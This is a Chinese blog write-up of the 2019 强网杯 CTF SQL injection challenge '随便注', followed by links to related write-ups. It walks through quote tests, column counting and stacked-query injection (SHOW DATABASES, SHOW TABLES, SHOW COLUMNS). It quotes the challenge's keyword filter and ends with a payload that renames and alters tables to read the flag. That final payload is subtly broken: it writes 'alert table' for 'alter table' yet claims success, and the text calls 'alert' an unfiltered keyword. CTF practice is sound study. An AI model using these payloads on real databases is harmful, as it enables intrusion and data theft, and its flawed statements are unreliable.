[强网杯 2019] 随便注

作者: LonelySong | 来源:发表于2020-04-03 19:10 被阅读0次

每天学习网络安全知识,本文记录强网杯的一个SQL注入题。



使用单引号测试,发现页面报错,说明此处存在SQL注入漏洞。


1'
1''

既然此处存在漏洞,那么我们就走正常流程测试下,如果不知道SQL注入正常流程的可以取看下我的sqllibs注入教程。

1.猜字段数

1' order by 3#
1' order by 2#


使用第一个payload测试的时候发现页面报错,再使用第二个payload时发现页面显示正常,因此我们可以得知当前数据库当前表存在2个字段。
这时候尝试union select进行联合查询。

2.使用联合查询

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

发现页面提示过滤了许多关键的命令,看来需要一些骚操作了。

3.尝试堆叠注入

1';show databases#

发现成功爆出所有数据库。
使用show tables;试试看看能不能得到表名

-1';show tables#

成功爆出当前数据库的两个表名;尝试查询表中的字段

0';show columns from `1919810931114514`;#

发现有一个flag字段,接下来就是尝试读取flag。

4. 再查看words表的结构

0';desc words;#

可以猜测我们提交查询的窗口就是在这个表里查询数据的。

5. 那么查询语句很有可能是 : selsect id,data from words where id =

然后1919810931114514只有一个flag字段
这时候虽然有强大的正则过滤,但没有过滤alert和rename关键字
这时候我们就可以已下面的骚姿势进行注入:
1.将words表改名为word1或其它任意名字
2.1919810931114514改名为words
3.将新的word表插入一列,列名为id
4.将flag列改名为data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

成功拿到flag。

相关文章

  • 强网杯2019 随便注

    buuctf第二题。根据题目提示可知是sql注入题先进入页面,发现一个输入框且有缺省值1,先在1后加上单引号,出现...

  • [强网杯 2019] 随便注

    每天学习网络安全知识,本文记录强网杯的一个SQL注入题。 使用单引号测试,发现页面报错,说明此处存在SQL注入漏洞...

  • 强网杯2019-WEB-随便注

    漏洞复现地址https://buuoj.cn/challenges#[强网杯%202019]随便注] 考察SQL注...

  • BUUCTF-[强网杯 2019]随便注 记录

    [强网杯 2019]随便注 进入该界面 正常步骤注入: 存在注入,order by 看看几个字段,3返回错误,说明...

  • BUUCTF/强网杯2019 随便注.堆叠注入?

    尝试注入发现过滤 /i不区分大小写匹配,也过滤了.sqlmap跑一波 能跑出数据库为surpersqli,但是因为...

  • 2019-强网杯-Web-随便注

    复现环境 https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9...

  • 2019-09-15 BUUCTF [强网杯 2019]随便注

    首先尝试了直接无过滤提取数据数据库,发现失败了(select等关键词被过滤)查看了别人的题解发现这题支持多语句执行...

  • 浅析mysql存储过程

    去年的强网杯,出了一道mysql堆叠注入叫随便注,这道题被好多比赛玩了一整年,直到现在还是有各种新姿势,但是今天我...

  • 强网杯2019 wp

    膜大佬们太强了,弱小的我只能鞭尸强网先锋。 签到 直接提交 强网先锋-上单 进入页面http://49.4.15....

  • 2019广东强网杯_wp

    Pwn pwn1 Run函数有个条件竞争,可以泄漏libc,后面libc换了2.27,所以条件竞争配合uaf写fd...

网友评论

    本文标题:[强网杯 2019] 随便注

    本文链接:https://www.haomeiwen.com/subject/yfpkphtx.html